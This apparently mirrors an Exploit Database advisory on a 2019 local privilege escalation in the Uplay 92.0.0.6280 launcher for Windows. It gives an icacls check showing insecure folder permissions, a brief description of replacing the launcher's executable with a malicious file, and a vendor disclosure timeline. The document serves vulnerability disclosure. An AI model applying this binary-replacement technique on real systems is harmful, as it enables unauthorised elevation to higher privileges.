Uplay 92.0.0.6280 – Local Privilege Escalation

• Exploit Database
• 12 阅读

• 作者： Kusol Watchara-Apanukorn
  日期： 2019-10-14
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47493/

• # Exploit Title: Uplay 92.0.0.6280 - Local Privilege Escalation
  # Date: 2019-08-07
  # Exploit Author: Kusol Watchara-Apanukorn, Pongtorn Angsuchotmetee, Manich Koomsusi
  # Vendor Homepage: https://uplay.ubisoft.com/
  # Version: 92.0.0.6280
  # Tested on: Windows 10 x64
  # CVE : N/A
  
  # Vulnerability Description: "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher" has in secure permission 
  # that allows all BUILTIN-USER has full permission. An attacker replace the 
  # vulnerability execute file with malicious file.
  
  ///////////////////////
   Proof of Concept
  ///////////////////////
  
  C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher"
  C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher BUILTIN\Users:(F)
   BUILTIN\Users:(OI)(CI)(IO)(F)
   NT SERVICE\TrustedInstaller:(I)(F)
   NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
   NT AUTHORITY\SYSTEM:(I)(F)
   NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
   BUILTIN\Administrators:(I)(F)
   BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
   BUILTIN\Users:(I)(RX)
   BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
   CREATOR OWNER:(I)(OI)(CI)(IO)(F)
   APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
   APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
   APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
   APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
  
  
  
  
  Vulnerability Disclosure Timeline:
  ==================================
  07 Aug, 19 : Found Vulnerability
  07 Aug, 19 : Vendor Notification
  14 Aug, 19 : Vendor Response
  18 Sep, 19 : Vendor Fixed
  18 Sep, 19: Vendor released new patched